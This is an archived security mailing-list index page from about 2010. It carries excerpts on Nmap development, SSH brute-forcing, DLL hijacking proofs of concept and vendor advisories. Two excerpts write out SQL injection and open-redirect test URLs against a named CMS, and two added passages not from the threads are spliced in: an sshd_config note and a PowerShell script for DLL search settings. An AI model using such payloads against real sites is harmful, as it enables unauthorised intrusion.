SecLists.Org Security Mailing List Archive
Any hacker will tell you that the latest news and exploits are not
found on any web site—not even Insecure.Org. No, the cutting edge
in security research is and will continue to be the full
disclosure mailing lists such as Bugtraq. Here we provide web
archives and RSS feeds (now including message extracts), updated in real-time, for many of our favorite lists. Browse the individual lists below, or search them all:
Nmap Development — Unmoderated technical development forum for debating ideas, patches, and suggestions regarding proposed changes to Nmap and related projects.
Re: [Ncat] I'd like to contribute a feature
miniBill (Sep 02)
2010/7/29 David Fifield <david () bamsoftware com>:
I've rapidly checked ncat_listen.c which is the file which, as far as I could understand,
actually invokes the platform-specific calls. As it works now it executes the command
every time someone connects. What I would like to do is to have one single command
execution, which collects all the users' input, and whose output is copied to every user.
As small as I can understand it, it won't...
Re: lua brocken in nse script
Seth Graham (Sep 01)
Ok Patrick, I'll do it and I'll comment on the results on this list.
Thanks for your help and congratulations on the job in NSE ;),
Seth
2010/9/2 Patrick Donnelly <batrick () batbytes com>
Re: lua brocken in nse script
Patrick Donnelly (Sep 01)
I don't see anything wrong with what you've done from here. Do the
following to see if this helps find the problem:
(1) Configure Nmap with --with-liblua=included. This will make Nmap
statically bind to Lua.
If the problem still occurs, turn Lua assertions on (keeping the above
change for static linking):
(2) Add "-DLUA_USE_APICHECK" to CFLAGS in nmap/liblua/Makefile.
Lua will catch most common errors this way.
Re: lua brocken in nse script
Seth Graham (Sep 01)
Hi Patrick,
2010/9/1 Patrick Donnelly <batrick () batbytes com>
I saw from the output that you are using Gentoo. Are you using the
Yes, I use Gentoo and by default my gcc CFLAGS optimizations are set to
-O2, configuring nmap 5.21-r1 (with Gentoo patches, I attach these) with lua
and ssl support and lua libraries dynamically.
With these optimization compilation flags all my system is working fine (-O2
is not so hard to break code...
Re: lua brocken in nse script
Patrick Donnelly (Sep 01)
Hello Seth,
I'm unable to reproduce this problem. I suspect your Nmap is
configured/compiled improperly. Usually when there are GC segfaults it
results from two different Lua installations being linked to (usually
dynamic and static linking). Although, I find this unlikely
considering where the fault occurred.
I saw from the output that you are using Gentoo. Are you using the
installation provided by Gentoo or did you compile Nmap yourself? If...
lua brocken in nse script
Seth Graham (Sep 01)
Hi to everybody,
I'm working on a little nse script to find proxies with method CONNECT
available. I've tested it with some parameter contexts and it works fine,
but when it's working with a very large ip range it crashes. I don't know if
it is a nse engine problem (with multithreading maybe?), a problem in my
little script or in lua libraries.
I write you a Segfault debug to improve some solution. Let's go.
==============================...
Re: rainmap - nmap wrapper for worker process
alexandru (Sep 01)
Thanks for your patience, SVN r20063 should be what you need. The worker code is in src/celeryd and can be run as is on
the worker nodes, provided dependencies are met and with the one caveat that the web-app instance must also be a
RabbitMQ node, though it doesn't need to be involved in scanning.
More details in docs/INSTALL. I'm looking forward to feedback related to either the install doc/procedure, or patches
to make the code better....
Re: Adding new NSE discovered targets to Nmap
Djalal Harouni (Aug 31)
Hi,
I've just merged my nmap-add-targets branch as r20044, so you can go
ahead and use the new NSE library target.lua to add new discovered targets.
Pls keep in mind that currently:
o By targets we mean targets specifications that are supported by Nmap
(hostnames, IP, networks etc).
o There is some target filtering but it is based on target specification
*strings*, and we only filter new targets that are added by NSE scripts,
Nmap targets are...
Re: nmap potentially vulnerable to Windows DLL Hijacking
Rob Nicholls (Aug 31)
This is presumably similar to the Wireshark issue:
http://www.exploit-db.com/exploits/14721/
http://www.nessus.org/plugins/index.php?view=single&id=48943
I must admit I was surprised to hear that Nmap tries to load this file
as it's not one that's usually distributed with WinPcap (it's related to
AirPcap, a separate project from CACE Technologies). I presume we can do
something in Nmap to fix/workaround this issue (perhaps copy whatever
the...
nmap potentially vulnerable to Windows DLL Hijacking
Nikhil Mittal (Aug 31)
Hi,
I was just checking nmap 5.21 for Windows DLL hijacking and it seems that nmap is searching for airpcap.dll in an
"insufficiently qualified path". If I force nmap to open a file from a network share it does try to load the dll from that
share; does it mean it is vulnerable? Correct me if wrong. I am unable to exploit the vulnerability because while accessing
airpcap.dll from the network share I can see FAST IO Disallowed in procmon. I have no idea...
Re: Ncrack 0.2 Alpha - SSH behaviour
ithilgore (Aug 31)
Hello Mike.
The Ncrack engine is built that way so that it initially increases the
number of parallel connections and then as it reaches the maximum capacity
of the server (as determined by closed connections or timeouts), it will
slowly decrease them before finally stabilizing.
Ncrack also uses a username/password pool where it places credentials that
weren't tested successfully (because the connection was prematurely closed
or whatever other...
Re: Ncrack 0.2 Alpha - SSH behaviour
Robin Wood (Aug 31)
Oh well, there goes my theory!
I'll have a look at the ncrack throttling stuff, could be useful in my work.
Robin
RE: Ncrack 0.2 Alpha - SSH behaviour
Mike Westmacott (Aug 31)
Hi Robin,
As I understand it nmap will attempt to determine what the maximum number of concurrent connections is when it starts
up, and will throttle back connections if it starts to see them being closed (according to debug). My issue here is
that I have two large files (I'm not saying it's down to size though!) - both which contain the correct password for
the user - and one of them will correctly identify the password, the other will not. I...
Re: NMAP hangs on MIPS
Nuno Gonçalves (Aug 31)
2010/8/31 Nuno Gonçalves <nunojpg () gmail com>:
The problem is with the use of class std::map<port_spec,
service_node> service_table.
line 241: i = service_table.find(ps); takes 50% of the time.
line 274: service_table[ps] = sn; takes 45% of the time.
Any suggestions why is this so slow on MIPS? Do I need optimization flags?
Thanks,
Nuno
Re: Ncrack 0.2 Alpha - SSH behaviour
Robin Wood (Aug 31)
I've not tried ncrack but I am working on an ssh bruteforcer of my own
and I've found a problem when testing against openssh, there is a
MaxStartups value that governs the "maximum number of concurrent
unauthenticated connections" check man sshd_config for more info.
I don't know if it was designed to protect against brute force attacks
but it does it because if you fire loads of passwords at once then you
trigger this limit and all...
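As an added illustration of the limit Robin describes (it is not part of his post or of Ncrack), this sshd_config fragment shows the three-field form of MaxStartups as documented in sshd_config(5). The single-number form, historically the default "10", refuses every new connection once that many unauthenticated sessions are pending; the start:rate:full form instead starts dropping new attempts at random once `start` are pending, with the drop probability rising linearly from `rate` percent to 100% at `full`. The numeric values below are chosen for the example, not OpenSSH defaults.

```text
# /etc/ssh/sshd_config (added illustration; values chosen for the example)
#
# MaxStartups start:rate:full
#   start - unauthenticated connections accepted before dropping begins
#   rate  - percent probability of refusing a new connection at 'start'
#   full  - pending count at which every new connection is refused
# Between start and full the refusal probability rises linearly, so a
# parallel brute-forcer sees connections closed before the password
# exchange rather than hitting a hard cliff at a single number.
MaxStartups 10:30:60

# Unauthenticated sessions that never complete the exchange are dropped
# after this many seconds, freeing their slot in the MaxStartups count.
LoginGraceTime 30
```

A tool that counts a connection closed during the banner or key exchange as a "tested" credential will mis-report under this setting; that is the throttling behaviour the Ncrack engine described earlier in the thread has to detect and back off from.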
Nmap Hackers — Moderated list for the most important new releases and announcements regarding the Nmap Security Scanner and related projects. We recommend that all Nmap users subscribe.
Nmap Defcon Release: Version 5.35DC1
Fyodor (Jul 16)
Hi folks. It has been 3.5 months since the last Nmap release
(5.30BETA1 on March 29), and anyone following the nmap-dev list knows
that we've been very busy during that time. So I'm pleased to release
Nmap version 5.35DC1 containing the fruits of that labor. The Defcon
name is because that conference is awesome! And also because David
Fifield and I have an exciting Nmap talk planned there and at Black
Hat in a couple weeks (see...
Nmap News and Last Chance to Take the Survey
Fyodor (Apr 30)
Hi Folks. I have some Nmap news to share with you:
First off, I'm delighted to introduce the 2010 Nmap/Google Summer of
Code Team! Google has sponsored eight student developers to spend
this summer enhancing the Nmap Security Scanner and related projects,
so you can expect great things in coming months. Ithilgore and Luis
MartinGarcia are returning to improve Ncrack and Nping, new students
Drazen Popovic and Djalal Harouni will be working on...
Survey Reminder
Fyodor (Apr 14)
Hi folks, I have a quick question for you:
Q: What do the Nmap Scripting Engine, Ndiff, and the Zenmap Topology
Mapper have in common?
A: They're all features which were added after you asked for them in
the 2006 Nmap Survey!
With that in mind, I'd like to thank the 1,013 people who have already
taken the 2010 survey. We just need 1,987 more and we can close this
survey up, tabulate and share results, choose the prize winners, and
post...
Nmap/SecTools Survey and GSoC Deadline
Fyodor (Apr 07)
Hello everyone. I hope you're enjoying the 5.30BETA1 release. So far
it has proven stable and functional, so don't let the BETA name scare
you. You can get it at http://nmap.org/download.html. Meanwhile, I
have some great news, and I'm also asking for your help on two things.
The first is that the Nmap Project was again accepted for the Google
Summer of Code program, so we'll have full time coding help this
summer! SoC previously brought us...
Nmap 5.30BETA1 Released w/37 new scripts and new Apple vuln
Fyodor (Mar 29)
Hi folks! It has been two months since the 5.21 release and we've
been very busy during that time! I hope you're happy with the results,
which is a new 5.30BETA1 release made today. Top features include:
o 37 new NSE scripts, bringing the total to 117! New scripts cover
SNMP, SSL, Postgres, MySQL, HTTP, LDAP, NFS, DB2, AFS, and many
more. Also check out the clever host scripts qscan and
ipidseq. Learn about them all at...
Nmap 5.21 released
Fyodor (Jan 27)
Hello everyone. I'm pleased to release Nmap 5.21, which contains zero
exciting new features! It is a bug-fix only release instead,
addressing about a dozen issues discovered since 5.20. Thanks for all
the testing and bug reports! None of the bugs are critical, but we
wanted to polish things up since 5.21 may be the latest stable version
for a while. That gives us time to tackle and stabilize big
development projects. If you want to know...
Lots of Nmap News
Fyodor (Jan 22)
Hi folks. I'm happy to report that the 5.20 release went well. But
with this many improvements, there will always be a few bugs found.
We're planning to round those up with a bugfix-only 5.21 release next
week. So please test out 5.20 and report any problems you experience:
Download Page: http://nmap.org/download.html
Bug Report Instructions: http://nmap.org/book/man-bugs.html
If you're running from a build of the latest SVN checkout, you...
Nmap 5.20 Released
Fyodor (Jan 20)
Happy new year, everyone. I'm happy to announce Nmap 5.20--our first
stable Nmap release since 5.00 last July! It offers more than 150
significant improvements, including:
o 30+ new Nmap Scripting Engine scripts
o enhanced performance and reduced memory consumption
o protocol-specific payloads for more effective UDP scanning
o a completely rewritten traceroute engine
o massive OS and version detection DB updates (10,000+ signatures)
The...
Nmap 5.00 Released!
Fyodor (Jul 16)
Hello everyone. I'm delighted to announce the release of Nmap 5.00!
This is the first major release since 4.50 in 2007, and includes about
600 significant changes since then! We consider this the most
important Nmap release since 1997, and we recommend that all current
users upgrade.
There are too many changes to list them all in this email, so here are
the top 5 improvements in Nmap 5:
1) The new Ncat tool aims to be your Swiss Army Knife...
Nmap news: stable release candidate 4.90RC1, SoC team, and new translations
Fyodor (Jun 26)
Hi Folks. I'm pleased to announce some exciting Nmap news:
[=================Nmap 4.90RC1==================]
It has been nearly 10 months (and 11 dev releases) since 4.76, the
last stable Nmap release. And we've made many dramatic changes, so it
is time for a new stable version! I've posted a release
candidate--4.90RC1--on the Nmap download page:
http://nmap.org/download.html
Please test it out, and let us know if you find any problems...
Nmap 4.85BETA6 now avail w/Conficker detection
Fyodor (Apr 01)
Hi Folks! In case you missed all the news reports yesterday, a couple
great researchers from the Honeynet Project (Tillmann Werner and Felix
Leder) and Dan Kaminsky came up with a way to remotely detect the
Conficker worm which has infected millions of machines worldwide.
Some say 15,000,000 machines infected, but that might just be
exaggerated AV-company BS for all I know. But there are clearly
millions of infections, and this massive botnet...
Nmap News: 4.84BETA4 release, Nmap book news, Summer of Code, Twitter, etc.
Fyodor (Mar 27)
Hello everyone. We've seen 848 messages on nmap-dev this year, but
this is my first post to nmap-hackers. So I have a lot of exciting
Nmap news to fit into this one email!
[=================Nmap 4.85BETA4==================]
While the last release I posted to this list was 4.76 in September of
last year, we've had four beta releases since then with hundreds of
important and dramatic changes. I'm pretty happy with the latest
4.85BETA4 release,...
Bugtraq — The premier general security mailing list. Vulnerabilities are often announced here first, so check frequently!
Vulnerabilities in CMS WebManager-Pro
MustLive (Sep 02)
Hello Bugtraq!
I want to warn you about SQL Injection and Redirector (URL Redirector Abuse)
vulnerabilities in CMS WebManager-Pro (SecurityVulns ID:11108). It's
Ukrainian commercial CMS.
SQL Injection:
http://site/c.php?id=1%20and%20version()=5
Redirector:
http://site/c.php?id=1&url=http://websecurity.com.ua
Affected products: both systems CMS WebManager-Pro from two developers.
Vulnerable are versions CMS WebManager-Pro up to 8.1...
{PRL} Novell Netware OpenSSH Remote Stack Overflow
Francis Provencher (Sep 02)
#####################################################################################
Application: Novell Netware OpenSSH Remote Stack Overflow
Platforms: Netware 6.5
Exploitation: Remote code execution
CVE Number:
Novell TID: 7006756
ZeroDayInitiative: ZDI-10-169
Author: Francis Provencher (Protek Research Lab's)
Blog: http://www.protekresearchlab.com/...
Moovida Media Player version 2.0.0.15 Insecure DLL Hijacking Vulnerability (libc.dll,quserex.dll)
YGN Ethical Hacker Group (Sep 02)
1. OVERVIEW
The Moovida Media Player application is vulnerable to an Insecure DLL
Hijacking vulnerability. Similar terms that have been coined for this
vulnerability are Remote Binary Planting, Unsafe Library Loading,
and Insecure DLL Loading/Injection/Hijacking/Preloading.
2. PRODUCT DESCRIPTION
Moovida Media Player is a free and open source media center that
allows you to enjoy all of your music, video and pictures
in an awesome...
[ MDVSA-2010:168 ] openssl
security (Sep 02)
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2010:168
http://www.mandriva.com/security/
_______________________________________________________________________
Package : openssl
Date : September 1, 2010
Affected: 2010.1
_______________________________________________________________________
Problem Description:
A vulnerability has been found...
[ MDVSA-2010:169 ] mozilla-thunderbird
security (Sep 02)
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2010:169
http://www.mandriva.com/security/
_______________________________________________________________________
Package : mozilla-thunderbird
Date : September 2, 2010
Affected: 2008.0, 2009.0, 2010.0, 2010.1
_______________________________________________________________________
Problem...
[USN-982-1] Wget vulnerability
Marc Deslauriers (Sep 02)
===========================================================
Ubuntu Security Notice USN-982-1 September 02, 2010
wget vulnerability
CVE-2010-2252
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 9.04
Ubuntu 9.10
Ubuntu 10.04 LTS
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem...
XSS vulnerability in ArtGK CMS
advisory (Sep 01)
Vulnerability ID: HTB22588
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_artgk_cms_1.html
Product: ArtGK CMS
Vendor: ArtGK ( http://artgk-cms.ru/ )
Vulnerable Version: 2009-08-28 16:00:00 and Probably Prior Versions
Vendor Notification: 18 August 2010
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking &...
Online Binary Planting Exposure Test
ACROS Lists (Sep 01)
ACROS Security has made the Online Binary Planting Exposure Test publicly accessible
for the benefit of all Windows users. This test should make it easy for users and
administrators to assess their exposure to binary planting attacks originating from
the Internet.
URL: http://www.binaryplanting.com/test.htm
Note that this test is NOT meant to answer whether you're vulnerable (at this point
where so many binary planting vulnerabilities exist out...
XSS vulnerability in Rumba CMS tags
advisory (Sep 01)
Vulnerability ID: HTB22591
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_rumba_cms.html
Product: Rumba CMS
Vendor: Rumba Netware Ltd. ( http://rumbacms.com )
Vulnerable Version: 2.4 and Probably Prior Versions
Vendor Notification: 18 August 2010
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking...
XSS vulnerability in ArtGK CMS forum
advisory (Sep 01)
Vulnerability ID: HTB22587
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_artgk_cms.html
Product: ArtGK CMS
Vendor: ArtGK ( http://artgk-cms.ru/ )
Vulnerable Version: 2009-08-28 16:00:00 and Probably Prior Versions
Vendor Notification: 18 August 2010
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking &...
XSS vulnerability in Rumba CMS
advisory (Sep 01)
Vulnerability ID: HTB22592
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_rumba_cms_1.html
Product: Rumba CMS
Vendor: Rumba Netware Ltd. ( http://rumbacms.com )
Vulnerable Version: 2.4 and Probably Prior Versions
Vendor Notification: 18 August 2010
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking &...
Tortoise SVN DLL Hijacking Vulnerability
nikhil_uitrgpv (Sep 01)
The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2010-3199 to this issue. This is a
candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.
XSS vulnerability in Amiro.CMS FAQ
advisory (Sep 01)
Vulnerability ID: HTB22590
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_amiro_cms_1.html
Product: Amiro.CMS
Vendor: Amiro ( http://www.amiro.ru/ )
Vulnerable Version: 5.8.4.0 and Probably Prior Versions
Vendor Notification: 18 August 2010
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking &...
VMSA-2010-0013 VMware ESX third party updates for Service Console
VMware Security Team (Sep 01)
------------------------------------------------------------------------
VMware Security Advisory
Advisory ID: VMSA-2010-0013
Synopsis: VMware ESX third party updates for Service Console
Issue date: 2010-08-31
Updated on: 2010-08-31 (initial release of advisory)
CVE numbers: CVE-2005-4268 CVE-2010-0624 CVE-2010-2063
CVE-2010-1321 CVE-2010-1168 CVE-2010-1447...
VMSA-2010-0013
VMware Security Team (Sep 01)
------------------------------------------------------------------------
VMware Security Advisory
Advisory ID: VMSA-2010-0013
Synopsis: VMware ESX third party updates for Service Console
Issue date: 2010-08-31
Updated on: 2010-08-31 (initial release of advisory)
CVE numbers: CVE-2005-4268 CVE-2010-0624 CVE-2010-2063
CVE-2010-1321 CVE-2010-1168 CVE-2010-1447...
Full Disclosure — An unmoderated high-traffic forum for disclosure of security information. Fresh vulnerabilities sometimes hit this list many hours before they pass through the Bugtraq moderation queue. The relaxed atmosphere of this quirky list provides some comic relief and certain industry gossip. Unfortunately 80% of the posts are worthless drivel, so finding the gems takes patience.
Re: DLL hijacking with Autorun on a USB drive
Pavel Kankovsky (Sep 02)
If your OS's security model "understands" programs and data belong in
different security domains then every instruction of code on your computer
is trusted to enforce that policy. Your line of defence goes through every
program and any bug can breach it. The failure is inevitable. [1]
[1] P. A. Loscocco, S. D. Smalley, P. A. Muckelbauer, R. C. Taylor,
S. J. Turner and J. F. Farrell, "The Inevitability of Failure: The Flawed...
Re: question regarding RSA
Pavel Kankovsky (Sep 02)
You made general questions about RSA as a cryptographic primitive.
There was nothing about PKI in them.
RSA encryption uses public keys. Public keys are--as their name
suggests--supposed to be known publicly. Anyone can compute ciphertexts
from plaintexts. An encryption oracle will not help you crack RSA private
keys. If you can do it with the oracle, you can do it without the oracle
as well.
As far as encryption is concerned the purpose of...
Verizon Wireless security contact?
auto666077 (Sep 02)
I'm looking for a Verizon Wireless security contact to report
somewhat minor security issues with their software. If you know
one, I'd appreciate it if you could reply to me with their contact
info.
[ MDVSA-2010:169 ] mozilla-thunderbird
security (Sep 02)
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2010:169
http://www.mandriva.com/security/
_______________________________________________________________________
Package : mozilla-thunderbird
Date : September 2, 2010
Affected: 2008.0, 2009.0, 2010.0, 2010.1
_______________________________________________________________________
Problem...
Re: DLL hijacking POC (failed, see for yourself)
p8x (Sep 02)
Hi Christian,
I tested the POC here on Win 7 x64 ultimate fully updated and the issue
does work for me.
Vulnerabilities in CMS WebManager-Pro
MustLive (Sep 02)
Hello Full-Disclosure!
I want to warn you about SQL Injection and Redirector (URL Redirector Abuse)
vulnerabilities in CMS WebManager-Pro (SecurityVulns ID:11108). It's
Ukrainian commercial CMS.
SQL Injection:
http://site/c.php?id=1%20and%20version()=5
Redirector:
http://site/c.php?id=1&url=http://websecurity.com.ua
Affected products: both systems CMS WebManager-Pro from two developers.
Vulnerable are versions CMS WebManager-Pro up to...
Re: DLL hijacking POC (failed, see for yourself)
Jacky Jack (Sep 02)
http://support.microsoft.com/kb/2264107
This is just optional. Not mandatory patch update as far as I know.
[USN-982-1] Wget vulnerability
Marc Deslauriers (Sep 02)
===========================================================
Ubuntu Security Notice USN-982-1 September 02, 2010
wget vulnerability
CVE-2010-2252
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 9.04
Ubuntu 9.10
Ubuntu 10.04 LTS
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem...
Re: DLL hijacking POC (failed, see for yourself)
Larry Seltzer (Sep 02)
I don't think you read my e-mail. They fixed it. Have you retested today?
*From:* Christian Sciberras [mailto:uuf6429 () gmail com]
*Sent:* Thursday, September 02, 2010 9:44 AM
*To:* Larry Seltzer
*Cc:* full-disclosure () lists grok org uk
*Subject:* Re: [Full-disclosure] DLL hijacking POC (failed, see for
yourself)
As I said at the very first email, the POC, even at it's best, doesn't work
on my 64bit system at all.
Regards,
Chris.
On Thu,...
Re: DLL hijacking POC (failed, see for yourself)
Christian Sciberras (Sep 02)
As I said at the very first email, the POC, even at it's best, doesn't work
on my 64bit system at all.
Regards,
Chris.
On Thu, Sep 2, 2010 at 3:41 PM, Larry Seltzer <larry () larryseltzer com>wrote:
Re: DLL hijacking POC (failed, see for yourself)
Larry Seltzer (Sep 02)
FYI everyone, ACROS has fixed the POC for 64-bit systems. The old one
failed on my Win7 64-bit and the new one works.
http://www.binaryplanting.com/test.htm
I did notice that if you just click on the link
(\\www.binaryplanting.com\demo\windows_address_book_64) Windows turns it
into a file:// url and opens it in the default browser (Chrome in my
case). The POC won't work because there's no remote CWD (at least I
imagine there isn't). If this is...
Re: DLL hijacking POC (failed, see for yourself)
Darren McDonald (Sep 02)
We're not, Microsoft have decided to make it the system administrators
problem through this registry setting. Which is fair enough IMO :)
(resent as I used the wrong from address)
Re: DLL hijacking POC (failed, see for yourself)
Darren McDonald (Sep 02)
I think that depends if its installed and on how the setting is
configured. Some environments are going to require DLLs to be loaded
from remote shares, others not. This isnt a 'patch' to a software
security flaw, its a security setting. Im guessing the default
configuration maybe messing around with the mentioned PoC, that was my
only point.
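The registry setting Darren refers to is the one KB2264107 documents: a CWDIllegalInDllSearch DWORD under the Session Manager key (the thread names the KB but not the value). The following is an added check, not code from the thread, from ACROS or from Microsoft, written for PowerShell on a machine where the KB has been installed; without the update the value is simply ignored and the default search order applies. It reads the system-wide level, explains what the DLL loader will do with the current working directory, and offers a setter. The level meanings are taken from the KB; the suggestion that 2 is the right trade-off for environments that only load DLLs from local disks is an assumption that restates Darren's point, not a recommendation from the thread.

```powershell
# Added example, not from the thread. Reads the per-machine
# CWDIllegalInDllSearch value that KB2264107 introduces (the thread cites
# the KB but not the value name) and reports how LoadLibrary will treat the
# current working directory. Meaningful only once the KB is installed.

$Key  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager'
$Name = 'CWDIllegalInDllSearch'

# Levels documented in KB2264107, keyed by their hex representation.
$Levels = @{
    '0x00000000' = 'CWD is searched, including remote CWDs (WebDAV, UNC shares)'
    '0x00000001' = 'CWD is skipped only when it is a WebDAV folder'
    '0x00000002' = 'CWD is skipped when it is a WebDAV folder or a remote (UNC) share'
    '0xFFFFFFFF' = 'CWD is never searched by LoadLibrary'
}

function Get-CwdDllSearchPolicy {
    $item = Get-ItemProperty -Path $Key -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) {
        return [pscustomobject]@{
            Value   = $null
            Meaning = 'value absent: default search order, CWD is searched (KB2264107 missing or unconfigured)'
        }
    }
    # REG_DWORD comes back as a signed Int32, so 0xFFFFFFFF reads as -1;
    # reinterpret the bytes as unsigned before formatting.
    $raw = [BitConverter]::ToUInt32([BitConverter]::GetBytes([int32]$item.$Name), 0)
    $hex = '0x{0:X8}' -f $raw
    $meaning = if ($Levels.ContainsKey($hex)) { $Levels[$hex] } else { 'undocumented value' }
    [pscustomobject]@{ Value = $hex; Meaning = $meaning }
}

function Set-CwdDllSearchPolicy {
    # Requires an elevated shell. Level 2 blocks the remote-CWD case that the
    # binaryplanting.com demo relies on while still allowing local CWD loads;
    # 0xFFFFFFFF is stricter and can break applications that expect CWD loads,
    # which is the administrator's trade-off Darren describes.
    param(
        [Parameter(Mandatory)]
        [ValidateSet('0', '1', '2', '0xFFFFFFFF')]
        [string]$Level
    )
    $unsigned = [Convert]::ToUInt32($Level, 16)
    # Store back as the signed Int32 the DWord provider expects.
    $signed = [BitConverter]::ToInt32([BitConverter]::GetBytes($unsigned), 0)
    Set-ItemProperty -Path $Key -Name $Name -Value $signed -Type DWord
    Get-CwdDllSearchPolicy
}

Get-CwdDllSearchPolicy
```

The same value name can also be set per application under the Image File Execution Options key for that executable, which is how an environment can keep remote CWD loads for one legacy program while tightening everything else; the machine-wide value above is the one the PoC thread is about.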
Re: DLL hijacking POC (failed, see for yourself)
Christian Sciberras (Sep 02)
Uh, what I was asking, is, with this patch in place, the issue is fixed,
forever?
Cheers,
Chris.
Re: DLL hijacking POC (failed, see for yourself)
Christian Sciberras (Sep 02)
Thanks Darren, that was very enlightening.
Considering those facts, where are we at in fixing this whole issue?
Cheers,
Chris.
Security Basics — A high-volume list which permits people to ask "stupid questions" without being derided as "n00bs". I recommend this list to network security newbies, but be sure to read Bugtraq and other lists as well.
Re: Is Outlook Anywhere secure?
Andre Pawlowski (Sep 02)
After I searched a lot in the net about this topic I often found my
email in this list.
Now I have done my research and configuration on this topic and want to
give others a hint where to look. I wrote information and
configurations about this topic in my blog (only in German)
http://blog.h4des.org/index.php?/archives/279-TMG-als-Proxy-Outlook-Anywhere-hardening.html
So feel free to use it and feel free to ask if something bothers you....
using cvss to assess process problems
robsonde (Sep 02)
Our IT managers have asked that we use CVSS to assess security issues for the last few months.
We have quite a good understanding of the system when it is used for "bugs".
But we have a few security issues that are more of a failure of process, people doing the wrong thing and such like.
These risks don't fit the CVSS framework at all, but at the same time we can see that they are security issues that
need to be assessed.
For...
Re: download by specified file type
J. Bakshi (Sep 02)
wget -r -A "*.gif" http://www.test.com
-A >> accept
-r >> recursive download
------------------------------------------------------------------------
Securing Apache Web Server with thawte Digital Certificate
In this guide we examine the importance of Apache-SSL and who needs an SSL certificate. We look at how SSL works, how
it benefits your company and how your customers can tell if a site is secure. You will find out...
Outlook anywhere
exzactly (Aug 31)
Has anyone else seen implementations of Outlook Anywhere? Personally I think
its not needed and a security risk but I want to see what the community has
to say.
download by specified file type
who cat (Aug 31)
I want to know how to use wget or curl to download specified files,
e.g., download all the GIF files from http://www.test.com
How can I achieve that?
Thanks!
All you best
------------------------
What we are struggling for ?
The life or the life ?
RE: RainbowCrack rainbow table generate
Pete.LeMay (Aug 27)
Check out the tables at freerainbowtables.com. If those don't suit your needs, the forum has several discussions on
this question.
-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On Behalf Of win.a
Sent: Wednesday, August 25, 2010 11:39 PM
To: security-basics () securityfocus com
Subject: RainbowCrack rainbow table generate
i want to user rainbowcrack to generate the rainbow table, but...
RainbowCrack rainbow table generate
win.a (Aug 26)
I want to use RainbowCrack to generate the rainbow table,
but I don't know how I can determine the parameters:
chain_len
chain_num
Is there a way to calculate them? Any suggestions are appreciated.
All you best
------------------------
What we are struggling for ?
The life or the life ?
Re: security advice
Erik (Aug 26)
On 25-8-2010 9:14, Andrei Popescu wrote:
Hi,
Be warned! Usually it is never "only a counterstrike server". Do not
trust the box and reinstall. I've seen and investigated a hacked box
where it was thought to "only run a psybounce". It turned out a lot more
was happening but since the kernel was made to shut up about it, it
would not show the rest of the activities. It was a database server for
provisioning an ISP. A...
[HITB-Announce] HITB2010 SIGNINT Sessions
Hafez Kamal (Aug 26)
Hack In The Box is proud to announce, a brand new lightning session
called HITB SIGINT (Signal Intelligence/Interrupt)! HITB SIGINT
sessions are designed to provide a quick 15 minute overview for
material and research that's up and coming - stuff that isn't quite
ready for the mainstream tracks of the conference but deserve a mention
nonetheless. Final year students who want to present their projects to
industry experts are also strongly...
RE: security advice
Andrei Popescu (Aug 25)
Hello,
I had something like this also.. I still have all the files, but in
my case the "hacker" just ran a CounterStrike server on my box. I have
found the exploit in a website that I host, it was an osCommerce and it had
a security issue in the pictures folder.. don't know how he had access but
the thing is he managed to reinstall openssh and somehow he got the root
password (not change it, I saw him logging in the...
RE: security advice
Grant, Richard (KYTC) (Aug 25)
Edmund I think you may need a different approach to Incident handling. We have experienced a couple compromised
servers. With over 3,000 servers physical and virtual we are too big of a target to miss forever. First the horse is
already out of the barn. Slamming the door shut will not change that.
This is a time for the Incident Handling Team to be called into action. This team would develop a plan for dealing
with the incident. Some of the...
Re: security advice
debiantech (Aug 25)
Hi,
Although not the only way this can happen, I am willing to bet this
machine is not only an email server but a public web server. Not only
this but a guess is you are running some sort of CMS/CRM on that
webserver that uses PHP, possibly a web based email interface. If I have
been right so far, my first suggestion is to go to the home page for the
software and compare the version you have to the current stable version
and read the...
Re: security advice
Robert Larsen (Aug 25)
Not knowing how you work makes your question hard to answer but a few
quick ones:
* Keep the system up to date (apt-get update && apt-get upgrade or similar)
* Install a host based intrusion detection system like Tripwire or AIDE
* Install a network based intrusion detection system like Snort
* Harden your installations with something like Bastille
* Run your system from a read-only filesystem and have only your mail
folders on writable...
Re: security advice
Mike Razzell (Aug 25)
Maybe this is considered obvious to others of greater experience or
expertise in the field but doesn't the possibility exist that they
could look at all the logs and configurations and find no
vulnerability permitting a point of entry if a user with
administrative credentials logged in from a compromised client or
(less likely IMO) over an unsecured connection, i.e. plaintext. If this
is the case you could fix everything you find and still get...
RE: security advice
Murda (Aug 25)
Hey Edmund,
